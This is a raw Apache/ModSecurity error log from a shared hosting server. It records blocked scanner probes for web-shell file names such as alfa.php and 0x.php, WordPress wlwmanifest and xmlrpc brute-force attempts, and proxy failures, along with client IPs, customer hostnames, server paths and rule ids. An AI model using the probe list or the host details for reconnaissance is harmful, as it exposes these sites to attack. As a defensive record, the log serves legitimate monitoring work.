[Tue May 26 14:23:46.746243 2026] [security2:error] [pid 606909:tid 607046] [client 20.116.59.164:15237] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/about.php"] [unique_id "ahVfml0yRtX9qA7aVUVfzAAAAIw"]
[Tue May 26 14:23:46.746369 2026] [security2:error] [pid 606909:tid 607046] [client 20.116.59.164:15237] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/about.php"] [unique_id "ahVfml0yRtX9qA7aVUVfzAAAAIw"]
[Tue May 26 14:23:46.759165 2026] [security2:error] [pid 610693:tid 610868] [client 4.201.75.230:5490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/xmrlpc.php"] [unique_id "ahVfmjvNO3hpmlY6M8RWGAAAAC0"]
[Tue May 26 14:23:47.704980 2026] [autoindex:error] [pid 606909:tid 607105] [client 35.247.48.147:49912] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:23:47.925266 2026] [security2:error] [pid 610693:tid 610859] [client 20.116.59.164:15339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/go.php"] [unique_id "ahVfmzvNO3hpmlY6M8RWJQAAACQ"]
[Tue May 26 14:23:47.925410 2026] [security2:error] [pid 610693:tid 610859] [client 20.116.59.164:15339] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/go.php"] [unique_id "ahVfmzvNO3hpmlY6M8RWJQAAACQ"]
[Tue May 26 14:23:48.021477 2026] [security2:error] [pid 606909:tid 607089] [client 20.116.59.164:11136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVfnF0yRtX9qA7aVUVf4AAAALc"]
[Tue May 26 14:23:48.021667 2026] [security2:error] [pid 606909:tid 607089] [client 20.116.59.164:11136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVfnF0yRtX9qA7aVUVf4AAAALc"]
[Tue May 26 14:23:48.224875 2026] [security2:error] [pid 606909:tid 607093] [client 35.247.48.147:49912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.48.247.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "masonicarkfoundation.in"] [uri "/xmlrpc.php"] [unique_id "ahVfnF0yRtX9qA7aVUVf4QAAALs"]
[Tue May 26 14:23:48.667460 2026] [security2:error] [pid 610693:tid 610852] [client 35.247.48.147:60386] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnDvNO3hpmlY6M8RWLwAAAB0"]
[Tue May 26 14:23:48.814744 2026] [security2:error] [pid 610693:tid 610837] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfnDvNO3hpmlY6M8RWKwAAAA4"]
[Tue May 26 14:23:48.930684 2026] [security2:error] [pid 610693:tid 610853] [client 20.116.59.164:15336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/vv.php"] [unique_id "ahVfnDvNO3hpmlY6M8RWMgAAAB4"]
[Tue May 26 14:23:48.930790 2026] [security2:error] [pid 610693:tid 610853] [client 20.116.59.164:15336] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/vv.php"] [unique_id "ahVfnDvNO3hpmlY6M8RWMgAAAB4"]
[Tue May 26 14:23:48.944461 2026] [security2:error] [pid 606909:tid 607140] [client 35.247.48.147:56247] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnF0yRtX9qA7aVUVf8gAAAOo"]
[Tue May 26 14:23:49.168512 2026] [security2:error] [pid 606909:tid 607057] [client 35.247.48.147:57695] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnV0yRtX9qA7aVUVf-QAAAJc"]
[Tue May 26 14:23:49.386207 2026] [security2:error] [pid 610693:tid 610899] [client 35.247.48.147:62290] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnTvNO3hpmlY6M8RWOwAAAEw"]
[Tue May 26 14:23:49.579058 2026] [security2:error] [pid 610693:tid 610930] [client 20.116.59.164:11147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahVfnTvNO3hpmlY6M8RWQAAAAGs"]
[Tue May 26 14:23:49.579179 2026] [security2:error] [pid 610693:tid 610930] [client 20.116.59.164:11147] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahVfnTvNO3hpmlY6M8RWQAAAAGs"]
[Tue May 26 14:23:49.926094 2026] [security2:error] [pid 610693:tid 610935] [client 35.247.48.147:62156] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnTvNO3hpmlY6M8RWQgAAAHA"]
[Tue May 26 14:23:50.065027 2026] [security2:error] [pid 606909:tid 607094] [client 4.201.75.230:5457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/class.php"] [unique_id "ahVfnl0yRtX9qA7aVUVf_AAAALw"]
[Tue May 26 14:23:50.135053 2026] [security2:error] [pid 610693:tid 610927] [client 35.247.48.147:53281] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnjvNO3hpmlY6M8RWRgAAAGg"]
[Tue May 26 14:23:50.526005 2026] [security2:error] [pid 610693:tid 610908] [client 20.116.59.164:15344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-admin/css/colors/index.php"] [unique_id "ahVfnjvNO3hpmlY6M8RWTAAAAFU"]
[Tue May 26 14:23:50.526132 2026] [security2:error] [pid 610693:tid 610908] [client 20.116.59.164:15344] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/wp-admin/css/colors/index.php"] [unique_id "ahVfnjvNO3hpmlY6M8RWTAAAAFU"]
[Tue May 26 14:23:50.636102 2026] [security2:error] [pid 610693:tid 610914] [client 35.247.48.147:51106] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnjvNO3hpmlY6M8RWTQAAAFs"]
[Tue May 26 14:23:50.902782 2026] [security2:error] [pid 606909:tid 607160] [client 35.247.48.147:51837] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnl0yRtX9qA7aVUVgAgAAAP4"]
[Tue May 26 14:23:51.108021 2026] [security2:error] [pid 606909:tid 607082] [client 20.116.59.164:11206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/public/css.php"] [unique_id "ahVfn10yRtX9qA7aVUVgAwAAALA"]
[Tue May 26 14:23:51.108151 2026] [security2:error] [pid 606909:tid 607082] [client 20.116.59.164:11206] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/public/css.php"] [unique_id "ahVfn10yRtX9qA7aVUVgAwAAALA"]
[Tue May 26 14:23:51.126720 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfnjvNO3hpmlY6M8RWUwAAACg"]
[Tue May 26 14:23:51.361795 2026] [security2:error] [pid 610693:tid 610831] [client 35.247.48.147:53087] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "masonicarkfoundation.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVfnzvNO3hpmlY6M8RWWAAAAAg"]
[Tue May 26 14:23:52.384127 2026] [security2:error] [pid 610693:tid 610850] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfnzvNO3hpmlY6M8RWZQAAABs"]
[Tue May 26 14:23:52.398466 2026] [security2:error] [pid 610693:tid 610915] [client 202.141.83.254:53892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfoDvNO3hpmlY6M8RWbwAAAFw"]
[Tue May 26 14:23:52.398562 2026] [security2:error] [pid 610693:tid 610915] [client 202.141.83.254:53892] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfoDvNO3hpmlY6M8RWbwAAAFw"]
[Tue May 26 14:23:53.652328 2026] [security2:error] [pid 610693:tid 610935] [client 20.116.59.164:15240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/f35.php"] [unique_id "ahVfoTvNO3hpmlY6M8RWgwAAAHA"]
[Tue May 26 14:23:53.652443 2026] [security2:error] [pid 610693:tid 610935] [client 20.116.59.164:15240] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/f35.php"] [unique_id "ahVfoTvNO3hpmlY6M8RWgwAAAHA"]
[Tue May 26 14:23:54.086442 2026] [security2:error] [pid 610693:tid 610938] [client 4.201.75.230:5471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/aw.php"] [unique_id "ahVfojvNO3hpmlY6M8RWhwAAAHM"]
[Tue May 26 14:23:54.666749 2026] [security2:error] [pid 610693:tid 610863] [client 67.216.237.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfojvNO3hpmlY6M8RWlAAAACg"], referer: https://www.anujtradingco.com/
[Tue May 26 14:23:54.740923 2026] [security2:error] [pid 606909:tid 607073] [client 20.116.59.164:11138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahVfol0yRtX9qA7aVUVgJQAAAKc"]
[Tue May 26 14:23:54.741015 2026] [security2:error] [pid 606909:tid 607073] [client 20.116.59.164:11138] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/alfa.php"] [unique_id "ahVfol0yRtX9qA7aVUVgJQAAAKc"]
[Tue May 26 14:23:54.759885 2026] [security2:error] [pid 606909:tid 606917] [remote 46.101.75.237:56462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVfol0yRtX9qA7aVUVgIwAAnQc"]
[Tue May 26 14:23:55.265995 2026] [security2:error] [pid 610693:tid 610921] [client 20.116.59.164:11146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahVfozvNO3hpmlY6M8RWpAAAAGI"]
[Tue May 26 14:23:55.266123 2026] [security2:error] [pid 610693:tid 610921] [client 20.116.59.164:11146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/css.php"] [unique_id "ahVfozvNO3hpmlY6M8RWpAAAAGI"]
[Tue May 26 14:23:55.414001 2026] [security2:error] [pid 610693:tid 610829] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfojvNO3hpmlY6M8RWmwAAAAY"]
[Tue May 26 14:23:55.522252 2026] [security2:error] [pid 610693:tid 610873] [client 20.116.59.164:11204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahVfozvNO3hpmlY6M8RWqQAAADI"]
[Tue May 26 14:23:55.522355 2026] [security2:error] [pid 610693:tid 610873] [client 20.116.59.164:11204] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahVfozvNO3hpmlY6M8RWqQAAADI"]
[Tue May 26 14:23:55.682948 2026] [security2:error] [pid 610693:tid 610909] [client 4.201.75.230:5639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/bb.php"] [unique_id "ahVfozvNO3hpmlY6M8RWqgAAAFY"]
[Tue May 26 14:23:56.213810 2026] [security2:error] [pid 610693:tid 610849] [client 154.161.32.97:56466] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVfozvNO3hpmlY6M8RWqAAAABo"]
[Tue May 26 14:23:56.348450 2026] [security2:error] [pid 606909:tid 607119] [client 20.116.59.164:11254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahVfpF0yRtX9qA7aVUVgPQAAANU"]
[Tue May 26 14:23:56.348568 2026] [security2:error] [pid 606909:tid 607119] [client 20.116.59.164:11254] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahVfpF0yRtX9qA7aVUVgPQAAANU"]
[Tue May 26 14:23:56.630998 2026] [security2:error] [pid 610693:tid 610939] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfpDvNO3hpmlY6M8RWtwAAAHQ"]
[Tue May 26 14:23:56.676967 2026] [proxy:error] [pid 610693:tid 610868] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:23:56.677041 2026] [proxy_http:error] [pid 610693:tid 610868] [client 20.116.59.164:15345] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:23:56.677644 2026] [proxy:error] [pid 610693:tid 610868] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:23:56.677689 2026] [proxy_http:error] [pid 610693:tid 610868] [client 20.116.59.164:15345] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:23:56.677802 2026] [security2:error] [pid 610693:tid 610868] [client 20.116.59.164:15345] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVfpDvNO3hpmlY6M8RWxQAAAC0"]
[Tue May 26 14:23:57.818364 2026] [security2:error] [pid 606909:tid 607094] [client 4.201.75.230:5637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/222.php"] [unique_id "ahVfpV0yRtX9qA7aVUVgTwAAALw"]
[Tue May 26 14:23:57.828211 2026] [security2:error] [pid 606909:tid 607097] [client 20.116.59.164:11228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/0x.php"] [unique_id "ahVfpV0yRtX9qA7aVUVgUAAAAL8"]
[Tue May 26 14:23:57.828291 2026] [security2:error] [pid 606909:tid 607097] [client 20.116.59.164:11228] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/0x.php"] [unique_id "ahVfpV0yRtX9qA7aVUVgUAAAAL8"]
[Tue May 26 14:23:58.398883 2026] [security2:error] [pid 606909:tid 607129] [client 67.216.237.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfpl0yRtX9qA7aVUVgWwAAAN8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1231675&moderation-hash=b9f3913f537919d09439896dc0e6dc48
[Tue May 26 14:23:58.413998 2026] [proxy:error] [pid 610693:tid 610949] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:23:58.414071 2026] [proxy_http:error] [pid 610693:tid 610949] [client 20.116.59.164:15253] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:23:58.414703 2026] [proxy:error] [pid 610693:tid 610949] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:23:58.414750 2026] [proxy_http:error] [pid 610693:tid 610949] [client 20.116.59.164:15253] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:23:58.414846 2026] [security2:error] [pid 610693:tid 610949] [client 20.116.59.164:15253] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.krishnawoodworks.com"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVfpjvNO3hpmlY6M8RW6AAAAH4"]
[Tue May 26 14:23:58.549101 2026] [security2:error] [pid 606909:tid 607125] [client 20.116.59.164:11226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 164.59.116.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahVfpl0yRtX9qA7aVUVgXQAAANs"]
[Tue May 26 14:23:58.549177 2026] [security2:error] [pid 606909:tid 607125] [client 20.116.59.164:11226] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xllent.in.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahVfpl0yRtX9qA7aVUVgXQAAANs"]
[Tue May 26 14:23:58.840082 2026] [security2:error] [pid 606909:tid 607127] [client 124.248.183.57:65096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.183.248.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-login.php/wp-login.php"] [unique_id "ahVfpl0yRtX9qA7aVUVgYAAAAN0"]
[Tue May 26 14:23:59.253141 2026] [security2:error] [pid 610693:tid 610890] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfpjvNO3hpmlY6M8RW8gAAAEM"]
